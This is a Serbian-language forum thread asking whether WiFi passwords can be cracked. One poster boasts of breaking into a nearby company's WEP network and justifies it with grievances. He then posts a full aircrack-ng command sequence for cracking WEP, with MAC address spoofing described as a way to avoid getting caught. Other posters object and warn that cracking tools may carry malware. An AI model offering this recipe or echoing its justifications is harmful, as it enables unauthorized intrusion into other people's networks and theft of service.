Dali je moguce da se provali WiFi sifra?

Može i ne može...zavisi koja je šifra.
Ako je zaštita preko WEP onda je lako. Ranije se to radilo sa BackTrack-om (linux)
a sada je to Kali Linux.
Ja sam to radio pre 5-6 godina sa BackTrack-om. Imao sam nekog biznismena na
daljini od 60-70 metara od mene koji je imao firmu sa više računara.
Na većim daljinama se ne isplati jer je slab signal.

Ako je WPA zaštita onda je to teško probiti. Ja nisam uspevao iako sam imao neke tutorijale.
Nešto sam probao sa reaver-om ali neuspešno.
Ne znam da li je u zadnjih 5-6 godina pronađen neki novi metod jer sam prestao da se bavim time.

@asketa - koja je bila poenta provaljivanja tog interneta ? Zar je tesko placati internet na mesecnoj bazi ? :dontunderstand:

Vlasnik firme je imao firmu i pare a ja sam imao znanje.
Tip je priglup, žena mu je sredila da dobije donacije za zgradu i firmu (novinarstvo, mediji)
od UNMIK-a i sada ne zna šta će sa parama. Žena mu takođe radi kod okupatora (1500 eura).
Da je znao nešto malo o internetu stavio bi WPA šifru.

Ja sam završio fakultet, išao u rat, naređeno nam je da ostanemo na KiM i da će nas plaćati,
u suprotnom gubimo posao a onda kada smo ostali na KiM, posle godinu dana smo proglašeni
za tehnološki višak i najureni s posla.

Naravno da mi je tada značilo 15 e mesečno za internet.

I sad ti meni pričaš o moralu i poštenju.

Poenta provaljivanja sifre wifia je da ne koristis hot point kada ti treba net negde van kuce i da saljes maskirane poruke....
Ni jedno nije opravdano, ali deca vole da budu hakeri, pa izgustiraju...
Dakle ima raznih programa za hakovanje wifia, ali su i oni vec sa nekim virusom koji otvara tvoj telefon za mnogo gore manipulacije nego sto ti mozes da smislis...

Poenta provaljivanja sifre wifia je da ne koristis hot point kada ti treba net negde van kuce i da saljes maskirane poruke....
Ni jedno nije opravdano, ali deca vole da budu hakeri, pa izgustiraju...
Dakle ima raznih programa za hakovanje wifia, ali su i oni vec sa nekim virusom koji otvara tvoj telefon za mnogo gore manipulacije nego sto ti mozes da smislis...
Upravo zbog ovoga sam ga i pitao zbog cega mu ovo treba jer provaljivanje necije sifre sa nekim programom donosi vise stete nego zadovoljstva time sto si usao na internet

Da bi koristio Kali, prvo mora da nauci linux, a posle mu i nije vazan wifi...:)

Ne mora mnogo toga da se nauči. Kali linux (ranije verzije -BackTrack) imaju u sebi alate za razbijanje WEP (WPA ?) zaštite.
U tutorijalu nađeš nekoliko naredbi koje ukucaš (kopiraš) i to je sve.
Evo ih: ima čak i promena MAC adrese da te ne uhvate :D

airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (kanal) -w (ime fajla) --bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
aircrack-ng -b (bssid) (ime fajla-01.cap)

Vlasnik firme je imao firmu i pare a ja sam imao znanje.
Tip je priglup, žena mu je sredila da dobije donacije za zgradu i firmu (novinarstvo, mediji)
od UNMIK-a i sada ne zna šta će sa parama. Žena mu takođe radi kod okupatora (1500 eura).
Da je znao nešto malo o internetu stavio bi WPA šifru.

Ja sam završio fakultet, išao u rat, naređeno nam je da ostanemo na KiM i da će nas plaćati,
u suprotnom gubimo posao a onda kada smo ostali na KiM, posle godinu dana smo proglašeni
za tehnološki višak i najureni s posla.

Naravno da mi je tada značilo 15 e mesečno za internet.

I sad ti meni pričaš o moralu i poštenju.
sta ces , slicni primeri su mnogo cesci od fer situacija.

Tema nije: Kako da platim internet
već: Da li je moguće da se provali WiFi šifra?

Zašto je postavljena tema ja ne znam. Moderatori su je ostavili, znači da je legalna.
Možda postavljač teme ima WiFi mrežu koju želi da zaštiti?
Možda želi da testira sigurnost svoje mreže?
A možda želi da postane haker

Vi reagujete kao da ste panduri odmah vidite neko kršenje zakona i postavljate
blago rečeno nesuvisla pitanja.

Back